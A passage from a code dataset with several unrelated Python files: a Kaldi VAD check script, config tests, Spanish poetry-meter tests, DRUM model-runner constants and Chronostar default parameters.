np\nfrom kaldiio import ReadHelper, WriteHelper\n\n\n\nvad_scp = 'mfcc/vad_train.1.scp'\nmfcc_scp = 'mfcc/raw_mfcc_train.1.scp'\n\nutt_ids = []\nvads = []\nutt_id2vad = {}\nutt_id2mfcc = {}\n\n#low_resol_vad = np.load('/media/sangjik/hdd2/dataset/speech/English/VoxCeleb2/npy_vad/vad_npy/train.17/id04462-35ZDCA1bA0U-00001.npy')\n#low_resol_vad = np.load('/media/sangjik/hdd2/dataset/speech/English/VoxCeleb2/npy_vad/vad_npy/train.1/id00026-KPiwotirhuQ-00017.npy')\n#print(low_resol_vad)\n#print(np.where(low_resol_vad == 0))\n#print(len(np.where(low_resol_vad == 0)[0]))\n\nwith ReadHelper('scp:' + vad_scp) as vad_reader:\n for i, (utt_id, vad) in enumerate(vad_reader):\n #if i < 1:\n if i < 1e7:\n #if utt_id == 'id00026-KPiwotirhuQ-00017':\n utt_id2vad[utt_id] = vad\n #print(utt_id, vad.shape)\n #print(type(utt_id), utt_id=='id00026-KPiwotirhuQ-00017', '{}:{}'.format(utt_id, np.where(vad ==0)))\n #print(utt_id, vad.shape)\n else:\n break\n\nwith ReadHelper('scp:' + mfcc_scp) as mfcc_reader:\n for utt_id, mfcc in mfcc_reader:\n #if i < 1:\n if utt_id == 'id00026-KPiwotirhuQ-00017':\n utt_id2mfcc[utt_id] = mfcc\n break\n\nutt_id='id00026-KPiwotirhuQ-00017'\n\nprint(utt_id2vad[utt_id].shape)\nwith WriteHelper('ark,scp:{},{}'.format('./tmp/vad.ark', './tmp/vad.scp')) as writer:\n writer[utt_id] = utt_id2vad[utt_id]\n\nprint(utt_id2mfcc[utt_id].shape)\nwith WriteHelper('ark,scp:{},{}'.format('./tmp/mfcc.ark', './tmp/mfcc.scp')) as writer:\n writer[utt_id] = utt_id2mfcc[utt_id]\n\n\n#print('vad reading completed')\n#with ReadHelper('scp:' + mfcc_scp) as mfcc_reader:\n# for i, (utt_id, mfcc) in enumerate(mfcc_reader):\n# if utt_id in utt_id2vad.keys():\n# vad = utt_id2vad[utt_id]\n# assert(len(vad) == len(mfcc))\n# print(i, 'check', vad.shape, mfcc.shape)\n","sub_path":"egs/voxceleb/v2/2.3.check_vad.py","file_name":"2.3.check_vad.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"173182752","text":"from .. import config\n\n\nclass TestConfig(object):\n def test_get_ceph_git_base_default(self):\n conf_obj = config.Config()\n conf_obj.teuthology_yaml = ''\n conf_obj.load_files()\n assert conf_obj.ceph_git_base_url == \"https://github.com/ceph/\"\n\n def test_set_ceph_git_base_via_private(self):\n conf_obj = config.Config()\n conf_obj._Config__conf['ceph_git_base_url'] = \"git://ceph.com/\"\n assert conf_obj.ceph_git_base_url == \"git://ceph.com/\"\n\n def test_set_nonstandard(self):\n conf_obj = config.Config()\n conf_obj.something = 'something else'\n assert conf_obj.something == 'something else'\n","sub_path":"teuthology/test/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"342932485","text":"from rantanplan.core import get_scansion\nfrom rantanplan.structures import get_rhyme_pattern_counts\nfrom rantanplan.structures import has_fixed_length_verses\nfrom rantanplan.structures import has_maximum_length\nfrom rantanplan.structures import has_minimum_length\nfrom rantanplan.structures import has_mixed_length_verses\nfrom rantanplan.structures import has_same_length_verses\n\n\ndef test_seguidilla():\n poem = \"\"\"Que se caiga la torre\n de Valladolid\n como a mí no me coja,\n ¿qué se me da a mí?\"\"\"\n output = \"seguidilla\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_seguidilla_compuesta():\n poem = \"\"\"La cebolla es escarcha\n cerrada y pobre:\n escarcha de tus días\n y de mis noches.\n Hambre y cebolla,\n hielo negro y escarcha\n grande y redonda.\"\"\"\n output = \"seguidilla_compuesta\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_chamberga():\n poem = \"\"\"Hoy ensalzo a Cristóbal,\n pero es tan alto\n que mi pluma no puede\n más levantarlo,\n que el hombre\n es de prendas mayores,\n le vemos\n para todo dispuesto,\n por grande\n no hay favor que no alcance.\"\"\"\n output = \"chamberga\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_seguidilla_gitana():\n poem = \"\"\"Yo voy como un ciego\n por esos caminos.\n Siempre pensando en la penita negra\n que llevo conmigo.\"\"\"\n output = \"seguidilla_gitana\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_cuareto_lira_a():\n poem = \"\"\"¡Cuán solitaria la nación que un día\n poblara inmensa gente,\n la nación cuyo imperio se extendía\n del Ocaso al Oriente!\"\"\"\n output = \"cuarteto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_cuareto_lira_b():\n poem = \"\"\"Fatigada del baile,\n encendido el color, breve el aliento,\n apoyada en mi brazo\n del salón se detuvo en un extremo.\"\"\"\n output = \"cuarteto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_safica():\n poem = \"\"\"Dulce vecino de la verde selva,\n huésped eterno del abril florido,\n vital aliento de la madre Venus,\n Céfiro blando.\"\"\"\n output = \"estrofa_sáfica\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_safica_1():\n poem = \"\"\"Bosque de piedras que arrancó la historia\n a las entrañas de la tierra madre,\n remanso de quietud, yo te bendigo,\n mi Salamanca.\"\"\"\n output = \"estrofa_sáfica\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_safica_2():\n poem = \"\"\"Dulce vecino de la verde selva,\n huésped eterno del abril florido,\n vital aliento de la madre Venus,\n Céfiro blando.\"\"\"\n output = \"estrofa_sáfica\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_francisco_de_la_torre():\n poem = \"\"\"Clamó la gente mísera y el cielo\n escondió los clamores y gemidos\n entre los rayos y espantosos truenos\n de tu turbada cara.\"\"\"\n output = \"estrofa_francisco_de_la_torre\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_endecha_real():\n poem = \"\"\"En un jardín de flores\n había una gran fuente,\n cuyo pilón servía\n de estanque a carpas, tencas y otros peces.\n Únicamente al riego\n el jardinero atiende,\n de modo que entretanto\n los peces, agua en que vivir no tienen.\"\"\"\n output = \"endecha_real\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_estrofa_manriquena():\n poem = \"\"\"Delio a las rejas de Elisa\n le canta en noche serena\n sus amores.\n Raya la luna, y la brisa\n al pasar plácida suena\n por las flores.\"\"\"\n output = \"estrofa_manriqueña\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_sexteto_lira_a():\n poem = \"\"\"Suelta al céfiro blando\n ese vellón que luce en tu cabeza,\n verás que, tremolando,\n a cautivar amantes, Lida, empieza,\n y que en cada cabello\n enreda un alma y aprisiona un cuello.\"\"\"\n output = \"sexteto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_sexteto_lira_b():\n poem = \"\"\"Era Fray Juan un viejo capuchino,\n sostén del peregrino,\n brazo del infeliz, pan del hambriento;\n era Fray Juan, el venerable anciano\n el del cerquillo cano,\n la presea mejor de su convento.\"\"\"\n output = \"sexteto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_septeto_lira():\n poem = \"\"\"El ánimo constante\n armado de verdad, mil aceradas,\n mil puntas de diamante\n embota y enflaquece; y desplegadas\n las fuerzas encerradas,\n sobre el opuesto bando\n con poderoso pie se ensalza hollando.\"\"\"\n output = \"septeto_lira\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_ovillejo():\n poem = \"\"\"¿Quién menoscaba mis bienes?\n Desdenes.\n Y ¿quién aumenta mis duelos?\n Los celos.\n Y ¿quien prueba mi paciencia?\n Ausencia.\n De ese modo, en mi dolencia\n ningún remedio se alcanza,\n pues me matan la esperanza\n desdenes, celos y ausencia.\"\"\"\n output = \"ovillejo\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_quinteto():\n poem = \"\"\"Juegan y beben: mas en bien, sin vicio,\n sin interés y sin exceso: tienen\n del cuarto de Fermín mal en el quicio\n encajada la puerta y se mantienen\n ojo avizor a él por el resquicio.\"\"\"\n output = \"quinteto\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_sexteto():\n poem = \"\"\"Entre las rocas de la costa alzada\n se oye un extraño hablar, de madrugada,\n de gentes que en la noche vigilaron;\n las barcas, animadas de un deseo,\n tienen un misterioso balanceo,\n y nunca se están quietas en donde las dejaron.\"\"\"\n output = \"sexteto\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_sextilla():\n poem = \"\"\"Existe una poesía\n sin ritmo ni armonía\n monótona, cansada,\n como una letanía...,\n de que está desterrada\n la pena y la alegría.\"\"\"\n output = \"sextilla\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_septeto():\n poem = \"\"\"Vengo a mirarte, campo doloroso,\n cuando son triste leña tus encinas,\n cuando en rigores de tu polvo inclinas\n sus mutilados miembros al reposo\n y en las huellas del ciervo sin camino\n se alberga el yerto ruiseñor piadoso\n segado, en pluma tierna, de su trino.\"\"\"\n output = \"septeto\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_septilla():\n poem = \"\"\"Luz de sueño, flor de mito,\n tu admirable cuerpo canta\n la gracia de Hermafrodito\n con lo aéreo de Atalanta;\n y de tu beldad ambigua\n la evocada musa antigua\n su himno de carne levanta.\"\"\"\n output = \"septilla\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_copla_arte_menor():\n poem = \"\"\"Un prado de grand llanura\n veía, con tantas flores,\n que sus diversas colores\n ocultavan la verdura,\n odífferas sin messura;\n en torno del qual passava\n un flumen, que lo çercava\n con su muy gentil fondura.\"\"\"\n output = \"copla_arte_menor\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_copla_mixta():\n poem = \"\"\"Como el profeta recuenta\n que las tronpas judiciales\n surgirán a los mortales\n con estraña sobrevienta;\n bien así todos vinieron\n aquellos que Amor siguieron\n de quien se faze grand cuenta.\"\"\"\n output = \"copla_mixta\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_copla_castellana():\n poem = \"\"\"Las riquezas son de amar;\n ca syn ellas grandes cosas\n maníficas nin famosas\n non se pueden acabar;\n por ellas son ensalmados\n los señores,\n príncipes e emperadores,\n e sus fechos memorados.\"\"\"\n output = \"copla_castellana\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_novena():\n poem = \"\"\"Hubo un hombre vizcaíno,\n por nombre llamado Juan,\n peor comedor de pan\n que bebedor de buen vino.\n Humilde de condición\n y de bajos pensamientos,\n de corta dispusición\n y de flaca complisión,\n pero de grandes alientos.\"\"\"\n output = \"novena\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_decima_antigua():\n poem = \"\"\"Fylósofo palanciano,\n varón de alta prudencia,\n a quien dio rrica influencia\n el grand planeta diafano;\n yo veo que syempre afano\n por fablar con sabidores,\n lyndos metrificadores;\n a vos, luz de trobadores,\n fablo en modo linpio sano,\n como hermano con hermano.\"\"\"\n output = \"décima_antigua\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_terceto_encadenado():\n poem = \"\"\"Gemidos oigo y lamentar doliente,\n y el ronco son de parches destemplados\n y el crujir de las armas juntamente.\n Marchan en pos del féretro soldados\n con tardo paso y armas funerales\n al eco de los bronces disparados.\n Y entre fúnebres pompas y marciales,\n en la morada de la muerte augusta,\n las bóvedas retumban sepulcrales.\n ¡Ay! Para siempre ya la losa adusta,\n ¡oh caro Albino! le escondió a tus ojos,\n mas no el bueno murió: la parca injusta\n roba tan solo efímeros despojos,\n y alba y triunfante la alcanzada gloria\n guarda en eternos mármoles la historia.\n \"\"\"\n output = \"terceto_encadenado\"\n input_poem = get_scansion(poem, rhyme_analysis=True)\n assert input_poem[0][\"structure\"] == output\n\n\ndef test_count_characters():\n pattern = \"ababcbcdcdedeff\"\n output = [0, 0, 1, 1, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1]\n assert get_rhyme_pattern_counts(pattern) == output\n\n\ndef test_has_mixed_length_verses_all():\n ranges_list = [range(11, 13), range(7, 12), range(11, 12)]\n length_a = 11\n length_b = 7\n assert has_mixed_length_verses(length_a, length_b, ranges_list)\n\n\ndef test_has_mixed_length_verses_only_one():\n ranges_list = [range(11, 13), range(8, 12), range(11, 12)]\n length_a = 11\n length_b = 7\n assert not has_mixed_length_verses(length_a, length_b, ranges_list)\n\n\ndef test_has_mixed_length_verses_none():\n ranges_list = [range(11, 13), range(7, 12), range(11, 12)]\n length_a = 6\n length_b = 4\n assert not has_mixed_length_verses(length_a, length_b, ranges_list)\n\n\ndef test_has_same_length_verses_true():\n fixed_length = 8\n ranges_list = [range(7, 13), range(8, 12), range(1, 12)]\n assert has_same_length_verses(fixed_length, ranges_list)\n\n\ndef test_has_same_length_verses_false():\n fixed_length = 14\n ranges_list = [range(7, 13), range(8, 12), range(1, 12)]\n assert not has_same_length_verses(fixed_length, ranges_list)\n\n\ndef test_has_fixed_length_verses():\n lengths_list = \"haiku\" # [5, 7, 5]\n ranges_list = [range(5, 13), range(7, 12), range(5, 12)]\n assert has_fixed_length_verses(lengths_list, ranges_list)\n\n\ndef test_has_fixed_length_verses_false():\n lengths_list = \"haiku\" # [5, 7, 5]\n ranges_list = [range(8, 13), range(8, 12), range(1, 12)]\n assert not has_fixed_length_verses(lengths_list, ranges_list)\n\n\ndef test_has_fixed_length_verses_fluctuation():\n lengths_list = \"haiku\" # [5, 7, 5]\n ranges_list = [range(6, 13), range(8, 12), range(6, 12)]\n assert has_fixed_length_verses(\n lengths_list, ranges_list, fluctuation_size=1)\n\n\ndef test_has_minimum_length():\n min_length = 14\n ranges_list = [range(8, 15), range(8, 15), range(1, 16)]\n assert has_minimum_length(min_length, ranges_list)\n\n\ndef test_has_minimum_length_false():\n min_length = 14\n ranges_list = [range(9, 13), range(8, 12), range(1, 12)]\n assert not has_minimum_length(min_length, ranges_list)\n\n\ndef test_has_maximum_length():\n max_length = 8\n ranges_list = [range(8, 15), range(8, 16), range(1, 18)]\n assert has_maximum_length(max_length, ranges_list)\n\n\ndef test_has_maximum_length_false():\n max_length = 8\n ranges_list = [range(9, 13), range(8, 16), range(1, 18)]\n assert not has_maximum_length(max_length, ranges_list)\n","sub_path":"tests/test_structures.py","file_name":"test_structures.py","file_ext":"py","file_size_in_byte":13325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"304847659","text":"import logging\nimport os\nimport sys\n\nfrom contextlib import contextmanager\nfrom enum import Enum\nfrom strictyaml import Bool, Int, Map, Optional, Str, load, YAMLError, Seq\nfrom pathlib import Path\n\nDEBUG = os.environ.get(\"DEBUG\")\n\nLOGGER_NAME_PREFIX = \"drum\"\nREGRESSION_PRED_COLUMN = \"Predictions\"\nCUSTOM_FILE_NAME = \"custom\"\nPOSITIVE_CLASS_LABEL_ARG_KEYWORD = \"positive_class_label\"\nNEGATIVE_CLASS_LABEL_ARG_KEYWORD = \"negative_class_label\"\nCLASS_LABELS_ARG_KEYWORD = \"class_labels\"\nTARGET_TYPE_ARG_KEYWORD = \"target_type\"\nRESPONSE_PREDICTIONS_KEY = \"predictions\"\nX_TRANSFORM_KEY = \"X.transformed\"\nY_TRANSFORM_KEY = \"y.transformed\"\n\nURL_PREFIX_ENV_VAR_NAME = \"URL_PREFIX\"\n\nMODEL_CONFIG_FILENAME = \"model-metadata.yaml\"\n\nPERF_TEST_SERVER_LABEL = \"__DRUM_PERF_TEST_SERVER__\"\n\nLOG_LEVELS = {\n \"noset\": logging.NOTSET,\n \"debug\": logging.DEBUG,\n \"info\": logging.INFO,\n \"warn\": logging.WARN,\n \"warning\": logging.WARNING,\n \"error\": logging.ERROR,\n \"critical\": logging.CRITICAL,\n}\n\n\nclass SupportedFrameworks:\n SKLEARN = \"scikit-learn\"\n TORCH = \"torch\"\n KERAS = \"keras\"\n XGBOOST = \"xgboost\"\n PYPMML = \"pypmml\"\n\n\nextra_deps = {\n SupportedFrameworks.SKLEARN: [\"scikit-learn\", \"scipy\", \"numpy\"],\n SupportedFrameworks.TORCH: [\"torch\", \"numpy\", \"scikit-learn\", \"scipy\"],\n SupportedFrameworks.KERAS: [\"scipy\", \"numpy\", \"h5py\", \"tensorflow>=2.2.1\"],\n SupportedFrameworks.XGBOOST: [\"scipy\", \"numpy\", \"xgboost\"],\n SupportedFrameworks.PYPMML: [\"pypmml\"],\n}\n\n\nclass CustomHooks:\n INIT = \"init\"\n READ_INPUT_DATA = \"read_input_data\"\n LOAD_MODEL = \"load_model\"\n TRANSFORM = \"transform\"\n SCORE = \"score\"\n SCORE_UNSTRUCTURED = \"score_unstructured\"\n POST_PROCESS = \"post_process\"\n FIT = \"fit\"\n\n ALL_PREDICT_STRUCTURED = [INIT, READ_INPUT_DATA, LOAD_MODEL, TRANSFORM, SCORE, POST_PROCESS]\n ALL_PREDICT_UNSTRUCTURED = [INIT, LOAD_MODEL, SCORE_UNSTRUCTURED]\n ALL_PREDICT_FIT_STRUCTURED = ALL_PREDICT_STRUCTURED + [FIT]\n\n\nclass UnstructuredDtoKeys:\n DATA = \"data\"\n QUERY = \"query\"\n MIMETYPE = \"mimetype\"\n CHARSET = \"charset\"\n\n\nclass StructuredDtoKeys:\n BINARY_DATA = \"binary_data\"\n MIMETYPE = \"mimetype\"\n TARGET_BINARY_DATA = \"target_binary_data\"\n TARGET_MIMETYPE = \"target_mimetype\"\n\n\nclass PredictionServerMimetypes:\n APPLICATION_JSON = \"application/json\"\n APPLICATION_OCTET_STREAM = \"application/octet-stream\"\n TEXT_PLAIN = \"text/plain\"\n APPLICATION_X_APACHE_ARROW_STREAM = \"application/x-apache-arrow-stream\"\n TEXT_MTX = \"text/mtx\"\n TEXT_CSV = \"text/csv\"\n EMPTY = \"\"\n\n\nclass InputFormatExtension:\n MTX = \".mtx\"\n ARROW = \".arrow\"\n\n\nInputFormatToMimetype = {\n InputFormatExtension.MTX: PredictionServerMimetypes.TEXT_MTX,\n InputFormatExtension.ARROW: PredictionServerMimetypes.APPLICATION_X_APACHE_ARROW_STREAM,\n}\n\n\nclass PythonArtifacts:\n PKL_EXTENSION = \".pkl\"\n TORCH_EXTENSION = \".pth\"\n KERAS_EXTENSION = \".h5\"\n JOBLIB_EXTENSION = \".joblib\"\n PYPMML_EXTENSION = \".pmml\"\n ALL = [PKL_EXTENSION, TORCH_EXTENSION, KERAS_EXTENSION, JOBLIB_EXTENSION, PYPMML_EXTENSION]\n\n\nclass RArtifacts:\n RDS_EXTENSION = \".rds\"\n ALL = [RDS_EXTENSION]\n\n\nclass JavaArtifacts:\n JAR_EXTENSION = \".jar\"\n MOJO_EXTENSION = \".zip\"\n POJO_EXTENSION = \".java\"\n MOJO_PIPELINE_EXTENSION = \".mojo\"\n ALL = [JAR_EXTENSION, MOJO_EXTENSION, POJO_EXTENSION, MOJO_PIPELINE_EXTENSION]\n\n\nclass ArgumentsOptions:\n ADDRESS = \"--address\"\n DIR = \"--dir\"\n DOCKER = \"--docker\"\n MEMORY = \"--memory\"\n INPUT = \"--input\"\n OUTPUT = \"--output\"\n TARGET = \"--target\"\n TARGET_CSV = \"--target-csv\"\n CODE_DIR = \"--code-dir\"\n NEGATIVE_CLASS_LABEL = \"--negative-class-label\"\n POSITIVE_CLASS_LABEL = \"--positive-class-label\"\n WEIGHTS_CSV = \"--row-weights-csv\"\n WEIGHTS = \"--row-weights\"\n SKIP_PREDICT = \"--skip-predict\"\n TIMEOUT = \"--timeout\"\n PRODUCTION = \"--production\"\n LOGGING_LEVEL = \"--logging-level\"\n LANGUAGE = \"--language\"\n NUM_ROWS = \"--num-rows\"\n MONITOR = \"--monitor\"\n DEPLOYMENT_ID = \"--deployment-id\"\n MODEL_ID = \"--model-id\"\n MONITOR_SETTINGS = \"--monitor-settings\"\n QUERY = \"--query\"\n CONTENT_TYPE = \"--content-type\"\n WITH_ERROR_SERVER = \"--with-error-server\"\n SHOW_STACKTRACE = \"--show-stacktrace\"\n MAX_WORKERS = \"--max-workers\"\n VERBOSE = \"--verbose\"\n VERSION = \"--version\"\n TARGET_TYPE = \"--target-type\"\n CLASS_LABELS = \"--class-labels\"\n CLASS_LABELS_FILE = \"--class-labels-file\"\n\n MAIN_COMMAND = \"drum\" if not DEBUG else \"./custom_model_runner/bin/drum\"\n\n SCORE = \"score\"\n SERVER = \"server\"\n FIT = \"fit\"\n PERF_TEST = \"perf-test\"\n NEW = \"new\"\n NEW_MODEL = \"model\"\n NEW_ENV = \"env\"\n VALIDATION = \"validation\"\n PUSH = \"push\"\n\n\nclass ArgumentOptionsEnvVars:\n TARGET_TYPE = \"TARGET_TYPE\"\n CODE_DIR = \"CODE_DIR\"\n NEGATIVE_CLASS_LABEL = \"NEGATIVE_CLASS_LABEL\"\n POSITIVE_CLASS_LABEL = \"POSITIVE_CLASS_LABEL\"\n CLASS_LABELS_FILE = \"CLASS_LABELS_FILE\"\n CLASS_LABELS = \"CLASS_LABELS\"\n ADDRESS = \"ADDRESS\"\n MAX_WORKERS = \"MAX_WORKERS\"\n\n MONITOR = \"MONITOR\"\n WITH_ERROR_SERVER = \"WITH_ERROR_SERVER\"\n SHOW_STACKTRACE = \"SHOW_STACKTRACE\"\n PRODUCTION = \"PRODUCTION\"\n\n VALUE_VARS = [\n TARGET_TYPE,\n CODE_DIR,\n NEGATIVE_CLASS_LABEL,\n POSITIVE_CLASS_LABEL,\n CLASS_LABELS_FILE,\n CLASS_LABELS,\n ADDRESS,\n MAX_WORKERS,\n ]\n BOOL_VARS = [WITH_ERROR_SERVER, SHOW_STACKTRACE, PRODUCTION, MONITOR]\n\n\nclass RunMode(Enum):\n SCORE = ArgumentsOptions.SCORE\n SERVER = ArgumentsOptions.SERVER\n PERF_TEST = ArgumentsOptions.PERF_TEST\n VALIDATION = ArgumentsOptions.VALIDATION\n FIT = ArgumentsOptions.FIT\n NEW = ArgumentsOptions.NEW\n PUSH = ArgumentsOptions.PUSH\n NEW_MODEL = \"new_model\"\n\n\nclass RunLanguage(Enum):\n PYTHON = \"python\"\n R = \"r\"\n JAVA = \"java\"\n\n\nclass TargetType(Enum):\n BINARY = \"binary\"\n REGRESSION = \"regression\"\n ANOMALY = \"anomaly\"\n UNSTRUCTURED = \"unstructured\"\n MULTICLASS = \"multiclass\"\n TRANSFORM = \"transform\"\n CLASSIFICATION = [BINARY, MULTICLASS]\n ALL = [BINARY, MULTICLASS, REGRESSION, ANOMALY, UNSTRUCTURED, TRANSFORM]\n\n\nclass TemplateType:\n MODEL = \"model\"\n ENV = \"environment\"\n\n\nclass EnvVarNames:\n DRUM_JAVA_XMX = \"DRUM_JAVA_XMX\"\n\n\n@contextmanager\ndef reroute_stdout_to_stderr():\n keep = sys.stdout\n sys.stdout = sys.stderr\n try:\n yield\n finally:\n sys.stdout = keep\n\n\n@contextmanager\ndef verbose_stdout(verbose):\n new_target = sys.stdout\n old_target = sys.stdout\n if not verbose:\n new_target = open(os.devnull, \"w\")\n sys.stdout = new_target\n try:\n yield new_target\n finally:\n sys.stdout = old_target\n\n\ndef config_logging():\n logging.basicConfig(format=\"%(asctime)-15s %(levelname)s %(name)s: %(message)s\")\n\n\nMODEL_CONFIG_SCHEMA = Map(\n {\n \"name\": Str(),\n \"type\": Str(),\n \"environmentID\": Str(),\n \"targetType\": Str(),\n \"validation\": Map({\"input\": Str(), Optional(\"targetName\"): Str()}),\n Optional(\"modelID\"): Str(),\n Optional(\"description\"): Str(),\n Optional(\"majorVersion\"): Bool(),\n Optional(\"inferenceModel\"): Map(\n {\n \"targetName\": Str(),\n Optional(\"positiveClassLabel\"): Str(),\n Optional(\"negativeClassLabel\"): Str(),\n Optional(\"classLabels\"): Seq(Str()),\n Optional(\"classLabelsFile\"): Str(),\n Optional(\"predictionThreshold\"): Int(),\n }\n ),\n Optional(\"trainingModel\"): Map({Optional(\"trainOnProject\"): Str()}),\n }\n)\n\n\ndef read_model_metadata_yaml(code_dir):\n code_dir = Path(code_dir)\n config_path = code_dir.joinpath(MODEL_CONFIG_FILENAME)\n if config_path.exists():\n with open(config_path) as f:\n try:\n model_config = load(f.read(), MODEL_CONFIG_SCHEMA).data\n except YAMLError as e:\n print(e)\n raise SystemExit(1)\n return model_config\n return None\n\n\nclass PayloadFormat:\n CSV = \"csv\"\n ARROW = \"arrow\"\n MTX = \"mtx\"\n\n\nclass SupportedPayloadFormats:\n def __init__(self):\n self._formats = {}\n self._mimetype_to_payload_format = {\n None: PayloadFormat.CSV,\n PredictionServerMimetypes.EMPTY: PayloadFormat.CSV,\n PredictionServerMimetypes.TEXT_CSV: PayloadFormat.CSV,\n PredictionServerMimetypes.TEXT_PLAIN: PayloadFormat.CSV,\n PredictionServerMimetypes.TEXT_MTX: PayloadFormat.MTX,\n PredictionServerMimetypes.APPLICATION_X_APACHE_ARROW_STREAM: PayloadFormat.ARROW,\n }\n\n def add(self, payload_format, format_version=None):\n self._formats[payload_format] = format_version\n\n def is_mimetype_supported(self, mimetype):\n payload_format = self._mimetype_to_payload_format.get(mimetype)\n if payload_format is None:\n return False\n\n return payload_format in self._formats\n\n def __iter__(self):\n for payload_format, format_version in self._formats.items():\n yield payload_format, format_version\n\n\ndef make_predictor_capabilities(supported_payload_formats):\n return {\n \"supported_payload_formats\": {\n payload_format: format_version\n for payload_format, format_version in supported_payload_formats\n }\n }\n\n\ntry:\n import pyarrow\nexcept ImportError:\n pyarrow = None\n\n\ndef get_pyarrow_module():\n return pyarrow\n\n\ndef verify_pyarrow_module():\n if pyarrow is None:\n raise ModuleNotFoundError(\"Please install pyarrow to support Arrow format\")\n return pyarrow\n","sub_path":"custom_model_runner/datarobot_drum/drum/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"477379791","text":"\"\"\"\nDefault parameters in Chronostar\n\nTHIS SHOULD GO TO CONFIG\n\"\"\"\n\npars = {\n 'component': 'sphere',\n 'filename_init_comps': None,\n 'filename_init_memb_probs': None,\n 'use_background': True,\n 'max_em_iterations': 100,\n 'min_em_iterations': 30,\n 'bic_conv_tol': 0.1,\n 'lnlike_convergence_slice_size': 10, # This should be at most 'min_em_iterations'/3 or smaller\n 'component': 'sphere',\n \n \n # INPUT\n 'data_table': None,\n \n # Column name for stellar IDs. This is used at the end when generating\n # final fits table with IDs and membership probabilities.\n # This is optional.\n 'stellar_id_colname': None,\n\n\n # File name that points to a stored list of components, typically from\n # a previous fit. Some example filenames could be:\n # - 'some/prev/fit/final_comps.npy\n # - 'some/prev/fit/2/A/final_comps.npy\n # Alternatively, if you already have the list of components, just\n # provide them to `init_comps`. Don't do both.\n # 'init_comps_file':None, # TODO: Is this redundant with 'init_comps'\n 'init_comps': None,\n\n # One of these two are required if initialising a run with ncomps != 1\n\n # One can also initialise a Chronostar run with memberships.\n # Array is [nstars, ncomps] float array\n # Each row should sum to 1.\n # Same as in 'final_membership.npy'\n # TODO: implement this in a way that info can be passed in from text file\n # e.g. a path to a file name\n # for now, can only be used from within a script, i.e. given a numpy\n # array object\n 'init_memb_probs': None, \n\n\n # Model\n 'component': 'sphere',\n 'max_comp_count': 20,\n\n # It turns out that in scipy.optimize.maximize tol=1 is optimal...\n 'optimisation_method': 'Nelder-Mead',\n 'convergence_tol': 1,\n \n # TODO: organise this together with min_em_iterations, lnlike_convergence_slice_size\n # EM convergence criterion: when the median values of lnprob slices change less than X (fraction)\n 'EM_convergence_requirement': 0.03, # fraction of maximal lnprob change\n\n\n # How to split group: in age or in space?\n 'split_group_method': 'age',\n 'split_label': '',\n\n\n 'trace_orbit_func': 'epicyclic',\n\n # Convergence criteria for when a fit_many_comps run has converged\n 'bic_conv_tol':0.1, # TODO: NOT TESTED!\n 'use_background':True,\n 'use_box_background':False,\n \n \n # TODO: DELETE THIS!!!\n 'historical_colnames': False,\n\n\n # OUTPUT\n 'overwrite_prev_run': False,\n 'folder_destination': 'result',\n\n # For every component of each iteration\n 'filename_best_comp_fit': 'best_comp_fit.npy',\n \n # Each iteration\n 